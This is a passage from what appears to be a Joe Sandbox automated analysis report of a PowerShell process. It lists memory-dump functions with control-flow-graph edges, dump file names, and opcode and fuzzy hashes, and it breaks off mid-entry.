                                                                    control_flow_graph 831 41b7728-41b775e 834 41b7760-41b7762 831->834 835 41b7767-41b7770 831->835 836 41b7811-41b7816 834->836 838 41b7779-41b7797 835->838 839 41b7772-41b7774 835->839 842 41b7799-41b779b 838->842 843 41b779d-41b77a1 838->843 839->836 842->836 844 41b77a3-41b77a8 843->844 845 41b77b0-41b77b7 843->845 844->845 846 41b77b9-41b77e2 845->846 847 41b7817-41b7848 845->847 850 41b77f0 846->850 851 41b77e4-41b77ee 846->851 854 41b78ca-41b78ce 847->854 855 41b784e-41b78a5 847->855 853 41b77f2-41b77fe 850->853 851->853 860 41b7800-41b7802 853->860 861 41b7804-41b780b 853->861 870 41b78d1 call 41b791a 854->870 871 41b78d1 call 41b7928 854->871 866 41b78b1-41b78bf 855->866 867 41b78a7 855->867 859 41b78d4-41b78d9 860->836 861->836 866->854 869 41b78c1-41b78c9 866->869 867->866 870->859 871->859
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab784bd7f0ead7c09f394e18670e0e91aa208c9b87943de2fe6bc6d4a6a75073
                                                                    • Instruction ID: 59d09f86c3a47a6aa30c1e9b9e1369e8daa7688bf4307033929f3fad24d38452
                                                                    • Opcode Fuzzy Hash: ab784bd7f0ead7c09f394e18670e0e91aa208c9b87943de2fe6bc6d4a6a75073
                                                                    • Instruction Fuzzy Hash: 5A51CE343042049FD705DB69D884AAA77E6FFC9314F1585BAE559CB792EB31EC01CBA0
                                                                    Function 041BBAD0 Relevance: .2, Instructions: 155COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 872 41bbad0-41bbb60 876 41bbb62 872->876 877 41bbb66-41bbb71 872->877 876->877 878 41bbb73 877->878 879 41bbb76-41bbbd0 call 41bafa8 877->879 878->879 886 41bbbd2-41bbbd7 879->886 887 41bbc21-41bbc25 879->887 886->887 888 41bbbd9-41bbbfc 886->888 889 41bbc27-41bbc31 887->889 890 41bbc36 887->890 894 41bbc02-41bbc0d 888->894 889->890 891 41bbc3b-41bbc3d 890->891 892 41bbc3f-41bbc60 891->892 893 41bbc62-41bbc65 call 41ba790 891->893 899 41bbc6a-41bbc6e 892->899 893->899 896 41bbc0f-41bbc15 894->896 897 41bbc16-41bbc1f 894->897 896->897 897->891 900 41bbc70-41bbc99 899->900 901 41bbca7-41bbcd6 899->901 900->901
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07d10429e2c09daf12357bf640ad6a96617fd39521fb5feda8fd8c51b1d8cfd3
                                                                    • Instruction ID: 9b2e8b060df1168a983f2c068ffa52ac4d70a6ff42e1de1b5faff4e6a61708f1
                                                                    • Opcode Fuzzy Hash: 07d10429e2c09daf12357bf640ad6a96617fd39521fb5feda8fd8c51b1d8cfd3
                                                                    • Instruction Fuzzy Hash: 57610771E04248DFDB15CFA9C584BDDBBF1FF88310F148169E819AB654EB74A941CB90
                                                                    Function 041BBACB Relevance: .1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a5b7ab593df1a84a28cba4a37e29c0af72c789e7a1f4d84bce244e6cdf7c0b0
                                                                    • Instruction ID: 6c66eaa7476408728306257fac6f30f3ef9a003a4b011e4dd78d9a50ce93935d
                                                                    • Opcode Fuzzy Hash: 7a5b7ab593df1a84a28cba4a37e29c0af72c789e7a1f4d84bce244e6cdf7c0b0
                                                                    • Instruction Fuzzy Hash: 9A51F5B1E04248DFCB15CFA9D584BDDBBF2FF88310F148069E819AB654EB74A945CB90
                                                                    Function 041BE42B Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c62160697920e78d0363aa9e2742d684c75b84f978cd90b9a5fe9b0dbcdacfbb
                                                                    • Instruction ID: 4b581ea92e36672e4c28d93165e2a043acc0523d60685383282b959272c58af0
                                                                    • Opcode Fuzzy Hash: c62160697920e78d0363aa9e2742d684c75b84f978cd90b9a5fe9b0dbcdacfbb
                                                                    • Instruction Fuzzy Hash: 6E4127B4700205CFDB14EF6CD5849AABBE6EF8831475484A9E649CB355EB30EC018B91
                                                                    Function 041BE430 Relevance: .1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 269e613dc0887ffe67c40dcf9fd97ad606abe2f8e9e73d3bc1641221fafe9147
                                                                    • Instruction ID: 4805b8a2c7462aba8a666703cfaabfdf83fe87f0f0e1a4f20c838575ffce38dd
                                                                    • Opcode Fuzzy Hash: 269e613dc0887ffe67c40dcf9fd97ad606abe2f8e9e73d3bc1641221fafe9147
                                                                    • Instruction Fuzzy Hash: 244137B4B00305CFCB14EFACD5C49AABBE6EF8830475484A9E649DB355EB30EC018B91
                                                                    Function 07023CCC Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2269783597.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7020000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9cd229dd268bd71e79462454a3055de052a2e78015fd2c8c2aefc67114ad1be4
                                                                    • Instruction ID: 8850c5a618bda0e759b85a43967c675ede0f8a30c7190050f63a32240bc6e2d6
                                                                    • Opcode Fuzzy Hash: 9cd229dd268bd71e79462454a3055de052a2e78015fd2c8c2aefc67114ad1be4
                                                                    • Instruction Fuzzy Hash: A1412AF2B00222DFCF658A6495407AAF7F3AFC0608F144AA5E8019F295C739EC4BD765
                                                                    Function 041B6FC8 Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca4bc55a29ff2b335c51f741a1c65f73597f683cc1194d533626fc790a54008f
                                                                    • Instruction ID: 68adeee2f86a6bed0fff92002b595e39ca87edb2f093785837fad422d4282b2f
                                                                    • Opcode Fuzzy Hash: ca4bc55a29ff2b335c51f741a1c65f73597f683cc1194d533626fc790a54008f
                                                                    • Instruction Fuzzy Hash: 4F412B34B046048FDB04DFA4C594AAE7BF2EFCE310F1544A9E456AB391DB31AC01CB51
                                                                    Function 041B2B00 Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61a818a48eacf7dc61a865f802afba0e9a4530cb628622d086c6b30a37a3fe15
                                                                    • Instruction ID: 1032d01475811a73e74a8410873ff12d7d30bf778a40df619fa616f3f256a31a
                                                                    • Opcode Fuzzy Hash: 61a818a48eacf7dc61a865f802afba0e9a4530cb628622d086c6b30a37a3fe15
                                                                    • Instruction Fuzzy Hash: CE413374A00205DFCB06CF49C5E89EABBB1FF48310B1186A9D955AB264C736FC51CBA4
                                                                    Function 041B6FB9 Relevance: .1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 78f7e1ce7d0db29f4ef4b26ce9f43ebfa88bba85423d2b8786a403196c33f37d
                                                                    • Instruction ID: ac34a3bfc6959dfdb5f9fc695a80d78df934fd4ab339ec4c9916081568424268
                                                                    • Opcode Fuzzy Hash: 78f7e1ce7d0db29f4ef4b26ce9f43ebfa88bba85423d2b8786a403196c33f37d
                                                                    • Instruction Fuzzy Hash: 9B312C75A045158FCB14CFA4C594AEEBBF1ABCE310F1444A9E452EB391DB31EC41DBA1
                                                                    Function 041BE423 Relevance: .1, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b517b316d40e7cf0e1b84317fdeae1a2d6919ae8479ec93dfdc5bc937deb1509
                                                                    • Instruction ID: 31cd47a42cabea3aec504dbe0fef371026b06694f00048c4ddc39a430240c3ce
                                                                    • Opcode Fuzzy Hash: b517b316d40e7cf0e1b84317fdeae1a2d6919ae8479ec93dfdc5bc937deb1509
                                                                    • Instruction Fuzzy Hash: 743148B4700305CFCB14EF6CD484AA9BBE2EF8831474485AAE559CB365EB34EC018B91
                                                                    Function 041BC398 Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 458050aecc6c3dc0237709370c7e54d3c0cb4c5abcd19b53df5e2024b6809cfd
                                                                    • Instruction ID: fed6165d0ccc1b63d3d29abfb0628317b8873a39feb231b0ace24a277c1f5f65
                                                                    • Opcode Fuzzy Hash: 458050aecc6c3dc0237709370c7e54d3c0cb4c5abcd19b53df5e2024b6809cfd
                                                                    • Instruction Fuzzy Hash: FF3170313006019FE719EB78D894B9ABB96EFC4310F14856DD609CB360DFB5A806CBE1
                                                                    Function 041BAE7F Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34f055a697f269ffab5bfa01d0909defb740a400ac7e71904a48a3046d2d1877
                                                                    • Instruction ID: 44cd1fada7c330d9cd28c6c381acbcd82db40f56e9a6604f2ca0a1a1f66809f2
                                                                    • Opcode Fuzzy Hash: 34f055a697f269ffab5bfa01d0909defb740a400ac7e71904a48a3046d2d1877
                                                                    • Instruction Fuzzy Hash: F6314AB0E002099FDB59DFB9D4947EEBBF6AF89340F148069E505EB350EB749C428B91
                                                                    Function 041BAE80 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03a141eaa024bc65622b075462b2d3506b4f5d17f40f708e8a003142e71effa3
                                                                    • Instruction ID: 2d471ed232f4e0472f6d4bc7cd7f4987cb9e69be3afbb78bfa1b98054896ac59
                                                                    • Opcode Fuzzy Hash: 03a141eaa024bc65622b075462b2d3506b4f5d17f40f708e8a003142e71effa3
                                                                    • Instruction Fuzzy Hash: 51314AB0E002099FDB59DFA9D4947EEBBF6AF89340F148069E505EB350EB749C428B91
                                                                    Function 041B93F8 Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d9e081c9eea341a080b35069e6d1d7e2896021e2a42cc9a13495b60b3915278
                                                                    • Instruction ID: f73663e719ad5f4eb819c6200ca546f6b54afc6f16aebaf6938d61260e1164fd
                                                                    • Opcode Fuzzy Hash: 1d9e081c9eea341a080b35069e6d1d7e2896021e2a42cc9a13495b60b3915278
                                                                    • Instruction Fuzzy Hash: 5231BAB59153048FDB60CF6AD0883CAFBF2EF88320F28C45AD59DA7205D7746482CB91
                                                                    Function 041BAD47 Relevance: .1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9e01b245533380ddfc27875ea6bd996575df78b3426acd28cbdb1a14b600e65
                                                                    • Instruction ID: 275901404edd863a397f1982d64ade8a9ef991f85899582493d93f14db8b546c
                                                                    • Opcode Fuzzy Hash: f9e01b245533380ddfc27875ea6bd996575df78b3426acd28cbdb1a14b600e65
                                                                    • Instruction Fuzzy Hash: 9C310FB4A002099FEB45EBA4D898AFE7BB7EF84300F1084A9D515AB394DB759D418F90
                                                                    Function 041BDFD7 Relevance: .1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d24d8a9def442328aa4627a3bb799e2ee3cf1238512c8fd467e3dd668921025
                                                                    • Instruction ID: 994ccab6b884204b929b404be868be6d22107a9e6ae5e2946e8dda2f7e3af9b6
                                                                    • Opcode Fuzzy Hash: 9d24d8a9def442328aa4627a3bb799e2ee3cf1238512c8fd467e3dd668921025
                                                                    • Instruction Fuzzy Hash: E3310670B002058FCB18DF69D598A9EBBF2BF88324F148969D406E7790DB75AC85CB91
                                                                    Function 041BAD48 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: add0950ce69a574ed128f32ad018f4ff00d08200439703cdd80232b53de541ce
                                                                    • Instruction ID: 961266153d9ab769ad28f6559a8a0c2c3ff89ac40d95680328a9da7f38dbb033
                                                                    • Opcode Fuzzy Hash: add0950ce69a574ed128f32ad018f4ff00d08200439703cdd80232b53de541ce
                                                                    • Instruction Fuzzy Hash: 493110B4E002099FEB45EBA4D898AFE7BB7EF84300F1084B9D515AB394DB759D418F90
                                                                    Function 041BDFD8 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8eb87b372016eae2d2260a1a6e57dc0b116a901c3cf5f78c7773916259c785a7
                                                                    • Instruction ID: f8843e58bc3a185db725590912c6f758c7d25b09e90d338d43886fe3e94b25cf
                                                                    • Opcode Fuzzy Hash: 8eb87b372016eae2d2260a1a6e57dc0b116a901c3cf5f78c7773916259c785a7
                                                                    • Instruction Fuzzy Hash: A9310770B002058FCB18DF69D598B9EBBF2BF88324F148969D406E7390DB75AC85CB90
                                                                    Function 0277F3D8 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2250440032.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_277d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cdfde1715c9c5fc2d44ff0f402ffb56eb482b743d66a01dcbbc0d9bb4659150d
                                                                    • Instruction ID: 5b09beb5c680100d08455277fce5204818381fe85c10f560c1ceb28ba5bf5d3a
                                                                    • Opcode Fuzzy Hash: cdfde1715c9c5fc2d44ff0f402ffb56eb482b743d66a01dcbbc0d9bb4659150d
                                                                    • Instruction Fuzzy Hash: 812100B6604200EFDF05CF50DAC0B26BBA1FB88314F20C5ADE9090A656C73AC456CBA2
                                                                    Function 07022700 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2269783597.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7020000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bab97f9c4b61bb55b148f0f0fa904b0da660ecb7c29950417d26d576acc91e0b
                                                                    • Instruction ID: 190132551a94c583bd51937194e7f27277adf1aa7037cbfb19b5426f05b79d3d
                                                                    • Opcode Fuzzy Hash: bab97f9c4b61bb55b148f0f0fa904b0da660ecb7c29950417d26d576acc91e0b
                                                                    • Instruction Fuzzy Hash: C22132B7A08226CFDB60DFD8C540B79B3F5BB41310F06C266E8148B220C734D946EBA1
                                                                    Function 0277F02C Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2250440032.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_277d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53ed510da95a3592803df02bd2659d4052c09f3f3e7088ef5e00dd1b2b3265d5
                                                                    • Instruction ID: d9e88430a98485a8dbe7bce179f80413a26db44a2f9ad06ab942ebaab855b739
                                                                    • Opcode Fuzzy Hash: 53ed510da95a3592803df02bd2659d4052c09f3f3e7088ef5e00dd1b2b3265d5
                                                                    • Instruction Fuzzy Hash: 2A2134B5604244EFDF14DF24DAC0B26BFA1FB94324F20C56DD90A4B752C77AD446CA62
                                                                    Function 0277F4CC Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2250440032.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_277d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 57005c4570f1946babcc8f897c5a5bd2526660431cebe9b7b1da3166b3e4982a
                                                                    • Instruction ID: 34d75a42385f10870c1a59f082ade43710d6bc7c60b9e8f44a6c52bf46440ae9
                                                                    • Opcode Fuzzy Hash: 57005c4570f1946babcc8f897c5a5bd2526660431cebe9b7b1da3166b3e4982a
                                                                    • Instruction Fuzzy Hash: 0F2124B1604240DFDF24EF24D6C4B26BBA5FB84718F20C66DD90A4B641C77AD846CAA2
                                                                    Function 041B9408 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1abababa0c88143b31d0e4633e5ea9551793f11f413264be23252ff03407414a
                                                                    • Instruction ID: 78b842aca6ce9bd1f76f41890e3235b82bf5d981ce30be7e571d5d22e7996896
                                                                    • Opcode Fuzzy Hash: 1abababa0c88143b31d0e4633e5ea9551793f11f413264be23252ff03407414a
                                                                    • Instruction Fuzzy Hash: D5216BB49157448FDB60CF6AC5887CAFBF2EF88310F28C45ED59D97205D77464828B91
                                                                    Function 041BE5C3 Relevance: .1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3366c6ff2aa93c4cd07a80223b656288e7d4d476de97684ac18ebec3e98caa33
                                                                    • Instruction ID: bda4dac9343342d6c8d9977bb8c84637e2b8d06f78a67a78f6579f2246204d8c
                                                                    • Opcode Fuzzy Hash: 3366c6ff2aa93c4cd07a80223b656288e7d4d476de97684ac18ebec3e98caa33
                                                                    • Instruction Fuzzy Hash: DB216634A01346CFCB16CF38D994ADDBBB2BF88304F0489A9D455EB291DB38A905CB90
                                                                    Function 041B7664 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbb01214dd20c1ac1e842c335ff972228ee00a53263b86c7aed88c5d0203f0e5
                                                                    • Instruction ID: 07226a78b4acca97093dfcfecfe8ded9161f315387ae7e5e227741fc7a49dd3c
                                                                    • Opcode Fuzzy Hash: fbb01214dd20c1ac1e842c335ff972228ee00a53263b86c7aed88c5d0203f0e5
                                                                    • Instruction Fuzzy Hash: B9112B7AB001188FDB04EBACE8849DD77F6EBC8325B0440A5E509EB355DB34EC128B91
                                                                    Function 0277F3D3 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2250440032.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_277d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                    • Instruction ID: 18b073d2c32fdada57fd047500de51bbb64b0805b7ea57257833a1a045d1d6f7
                                                                    • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                    • Instruction Fuzzy Hash: AF216D76504280DFCF06CF54DAC4B16BF72FB88314F24C5A9D9494A666C33AD46ACF92
                                                                    Function 041B79AA Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8775ab25eeb609d72eb10cd5adc11919c196f3060e8f5bbe226b3b3f4745f09
                                                                    • Instruction ID: fa0df7584eab9b2de0c2320693089917780d05362cf55ffa538dde5c79064395
                                                                    • Opcode Fuzzy Hash: e8775ab25eeb609d72eb10cd5adc11919c196f3060e8f5bbe226b3b3f4745f09
                                                                    • Instruction Fuzzy Hash: EF01D8317043559FDB26CB69E880ABE7BEAEBC922471005BEE449D7241DB31AD05C7A1
                                                                    Function 041B2C5C Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5b95518f5653fde64360e6f5bd92b32aade92ed86754d18b5b839e3281ea4a5f
                                                                    • Instruction ID: cd5bcc06f3debabb92fd2ebc874130efdeaae2d9127468975d6f0c24b18f7333
                                                                    • Opcode Fuzzy Hash: 5b95518f5653fde64360e6f5bd92b32aade92ed86754d18b5b839e3281ea4a5f
                                                                    • Instruction Fuzzy Hash: 421182355093949FCB03DF6CD8A09E97F70EF4B320B1541C7D194AB2A2C6369949CBA5
                                                                    Function 0277F027 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2250440032.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_277d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
                                                                    • Instruction ID: d105bad2e906c196222929ce23dee3f120c3873ef4dd74558abcafe4794bdce8
                                                                    • Opcode Fuzzy Hash: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
                                                                    • Instruction Fuzzy Hash: D1119D7A504284DFCB15CF14D6C4B15BFA1FB84328F28C6AAD8494BB56C33AD45ACB62
                                                                    Function 0277F4C7 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2250440032.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_277d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
